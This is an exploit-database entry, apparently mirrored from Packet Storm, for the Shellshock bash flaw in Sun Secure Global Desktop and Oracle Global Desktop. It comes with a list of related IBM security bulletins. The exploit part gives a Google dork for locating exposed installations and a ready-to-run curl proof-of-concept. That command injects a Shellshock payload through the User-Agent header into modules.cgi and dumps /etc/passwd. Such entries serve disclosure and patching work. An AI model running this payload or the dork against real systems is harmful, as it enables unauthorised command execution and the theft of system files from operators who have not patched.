Sun Secure Global Desktop / Oracle Global Desktop Shellshock

🗓️ 07 Jun 2016 00:00:00Reported by lastc0deType

packetstorm🔗 packetstormsecurity.com👁 68 Views

Sun Secure Global Desktop and Oracle Global Desktop Shellshock vulnerabilit

Reporter	Title	Published	Views	Family All 187
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	15 Jun 201807:01	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	19 Jul 202000:49	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in bash affect IBM Flex System Chassis Management Module (CMM)	31 Jan 201902:25	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	31 Jan 201901:35	–	ibm
IBM Security Bulletins	Security Bulletins for IBM Tealeaf Customer Experience offerings	16 Jun 201819:35	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Jun 201800:08	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	16 Jun 201813:58	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)	18 Oct 201903:50	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)	31 Jan 201901:30	–	ibm
IBM Security Bulletins	Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)	15 Sep 202112:14	–	ibm

`# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop  
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client  
# Date: 6/4/2016  
# Exploit Author: [email protected]  
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/  
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html  
# Version: 4.61.915  
# Tested on: Linux  
  
VULNERABLE FILE  
http://target.com//tarantella/cgi-bin/modules.cgi  
  
POC :  
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt  
  
localhost@~#cat xixixi.txt  
which will print out the content of /etc/passwd file.  
  
`

07 Jun 2016 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.91694